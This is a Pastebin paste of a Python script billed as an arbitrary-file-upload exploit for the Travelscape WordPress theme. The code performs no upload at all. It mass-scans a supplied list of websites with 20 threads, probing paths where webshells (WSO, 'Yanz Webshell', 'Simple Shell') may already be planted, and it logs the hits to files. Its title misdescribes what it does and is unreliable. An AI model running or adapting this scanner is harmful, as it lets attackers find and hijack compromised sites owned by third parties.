Advertisement
FlyFar

Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload

Apr 11th, 2024
951
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 5.57 KB | Cybersecurity | 0 0
  1. # Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload
  2. # Date: 2024-04-01
  3. # Author: Milad Karimi (Ex3ptionaL)
  4. # Category : webapps
  5. # Tested on: windows 10 , firefox
  6.  
  7. import sys
  8. import os.path
  9. import requests
  10. import re
  11. import urllib3
  12. from requests.exceptions import SSLError
  13. from multiprocessing.dummy import Pool as ThreadPool
  14. from colorama import Fore, init
  15. init(autoreset=True)
  16. error_color = Fore.RED
  17. info_color = Fore.CYAN
  18. success_color = Fore.GREEN
  19. highlight_color = Fore.MAGENTA
  20. requests.urllib3.disable_warnings()
  21. headers = {
  22.     'Connection': 'keep-alive',
  23.     'Cache-Control': 'max-age=0',
  24.     'Upgrade-Insecure-Requests': '1',
  25.     'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;
  26. wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107
  27. Mobile Safari/537.36',
  28.     'Accept':
  29. 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
  30.  
  31.     'Accept-Encoding': 'gzip, deflate',
  32.     'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
  33.     'Referer': 'www.google.com'
  34. }
  35. def URLdomain(url):
  36.     if url.startswith("http://"):
  37.         url = url.replace("http://", "")
  38.     elif url.startswith("https://"):
  39.         url = url.replace("https://", "")
  40.     if '/' in url:
  41.         url = url.split('/')[0]
  42.     return url
  43. def check_security(url):
  44.     fg = success_color
  45.     fr = error_color
  46.     try:
  47.         url = 'http://' + URLdomain(url)
  48.         check = requests.get(url +
  49. '/wp-content/themes/travelscape/json.php', headers=headers,
  50. allow_redirects=True, timeout=15)
  51.         if 'MSQ_403' in check.text:
  52.             print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
  53.             open('MSQ_403.txt', 'a').write(url +
  54. '/wp-content/themes/travelscape/json.php\n')
  55.         else:
  56.             url = 'https://' + URLdomain(url)
  57.             check = requests.get(url +
  58. '/wp-content/themes/aahana/json.php', headers=headers,
  59. allow_redirects=True, verify=False, timeout=15)
  60.             if 'MSQ_403' in check.text:
  61.                 print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
  62.                 open('MSQ_403.txt', 'a').write(url +
  63. '/wp-content/themes/aahana/json.php\n')
  64.             else:
  65.                 print(' -| ' + url + ' --> {}[Failed]'.format(fr))
  66.         check = requests.get(url + '/wp-content/themes/travel/issue.php',
  67. headers=headers, allow_redirects=True, timeout=15)
  68.         if 'Yanz Webshell!' in check.text:
  69.             print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
  70.             open('wso.txt', 'a').write(url +
  71. '/wp-content/themes/travel/issue.php\n')
  72.         else:
  73.             url = 'https://' + URLdomain(url)
  74.         check = requests.get(url + '/about.php', headers=headers,
  75. allow_redirects=True, timeout=15)
  76.         if 'Yanz Webshell!' in check.text:
  77.             print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
  78.             open('wso.txt', 'a').write(url + '/about.php\n')
  79.         else:
  80.             url = 'https://' + URLdomain(url)
  81.         check = requests.get(url +
  82. '/wp-content/themes/digital-download/new.php', headers=headers,
  83. allow_redirects=True, timeout=15)
  84.         if '#0x2525' in check.text:
  85.             print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
  86.             open('digital-download.txt', 'a').write(url +
  87. '/wp-content/themes/digital-download/new.php\n')
  88.         else:
  89.             print(' -| ' + url + ' --> {}[Failed]'.format(fr))
  90.             url = 'http://' + URLdomain(url)
  91.         check = requests.get(url + '/epinyins.php', headers=headers,
  92. allow_redirects=True, timeout=15)
  93.         if 'Uname:' in check.text:
  94.             print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
  95.             open('wso.txt', 'a').write(url + '/epinyins.php\n')
  96.         else:
  97.             print(' -| ' + url + ' --> {}[Failed]'.format(fr))
  98.             url = 'https://' + URLdomain(url)
  99.         check = requests.get(url + '/wp-admin/dropdown.php',
  100. headers=headers, allow_redirects=True, verify=False, timeout=15)
  101.         if 'Uname:' in check.text:
  102.             print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
  103.             open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')
  104.         else:
  105.             url = 'https://' + URLdomain(url)
  106.             check = requests.get(url +
  107. '/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,
  108. allow_redirects=True, verify=False, timeout=15)
  109.             if 'Simple Shell' in check.text:
  110.                 print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
  111.                 open('dummyyummy.txt', 'a').write(url +
  112. '/wp-content/plugins/dummyyummy/wp-signup.php\n')
  113.             else:
  114.                 print(' -| ' + url + ' --> {}[Failed]'.format(fr))
  115.     except Exception as e:
  116.         print(f' -| {url} --> {fr}[Failed] due to: {e}')
  117. def main():
  118.     try:
  119.         url_file_path = sys.argv[1]
  120.     except IndexError:
  121.         url_file_path = input(f"{info_color}Enter the path to the file
  122. containing URLs: ")
  123.         if not os.path.isfile(url_file_path):
  124.             print(f"{error_color}[ERROR] The specified file path is
  125. invalid.")
  126.             sys.exit(1)
  127.     try:
  128.         urls_to_check = [line.strip() for line in open(url_file_path, 'r',
  129. encoding='utf-8').readlines()]
  130.     except Exception as e:
  131.         print(f"{error_color}[ERROR] An error occurred while reading the
  132. file: {e}")
  133.         sys.exit(1)
  134.     pool = ThreadPool(20)
  135.     pool.map(check_security, urls_to_check)
  136.     pool.close()
  137.     pool.join()
  138.     print(f"{info_color}Security check process completed successfully.
  139. Results are saved in corresponding files.")
  140. if __name__ == "__main__":
  141.     main()
  142.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement